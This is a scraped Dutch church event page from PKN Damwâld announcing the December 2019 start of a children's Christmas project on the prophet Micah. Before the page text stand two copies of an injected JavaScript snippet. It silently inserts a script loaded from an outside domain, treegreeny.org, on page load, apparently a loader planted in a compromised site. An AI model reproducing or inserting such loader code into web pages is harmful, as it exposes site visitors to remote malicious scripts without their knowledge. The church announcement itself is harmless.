;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start Kingkids kerstproject - PKN Damwâld
1 december 2019
09:30 t/m 10:30
't Skûlplak
Start Kingkids kerstproject

Wij zijn alweer enkele weken bezig en wat zijn er weer veel kinderen. Zo mooi en bijzonder om elke zondag met elkaar in het Skûlplak te zijn. Samen met elkaar te zingen, te luisteren naar de verhalen uit de Bijbel, te bidden, verwerkingen te maken, spelletjes te doen en natuurlijk de gezelligheid met elkaar.
Op 1 december starten we alweer met het kerstproject. De vier adventszondagen beginnen we zoals voorgaande jaren weer in de kerk. Na het kindermoment gaan we als KingKids naar het Skûlplak waar de kinderen ook weer opgehaald kunnen worden.
Tijdens deze KingKidsochtenden (in het Skûlplak) gaan we oefenen voor het toneelstuk dat we laten zien tijdens het kerstfeest. Dus het is wel belangrijk om dan ook aanwezig te zijn!
Het kerstproject van de KingKids heeft dit jaar als thema ‘God belooft de Vredekoning’. We lezen in het Bijbelboek Micha hoe de profeet Micha werkt in Juda. Hij mag in een tijd van bedreigingen aan het volk vertellen over wat er komen gaat, vanuit Gods perspectief. Micha belooft dat God zal ingrijpen en vrede zal brengen. Micha geeft het volk Israël en ons een bijzonder vergezicht. God heeft een plan: de Koning die in vrede zal regeren, komt.
Het kerstproject herinnert ons niet alleen aan Jezus’ komst op aarde, maar laat ons ook vooruitkijken naar de tijd dat Hij als Koning zal terugkomen en zal regeren over heel de aarde. Wij mogen in het project Gods beloften zien en ervaren hoe het zou kunnen zijn. Leven met het oog gericht op de toekomst, trouw aan Gods geboden en leven vanuit echte liefde voor de Heer.

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld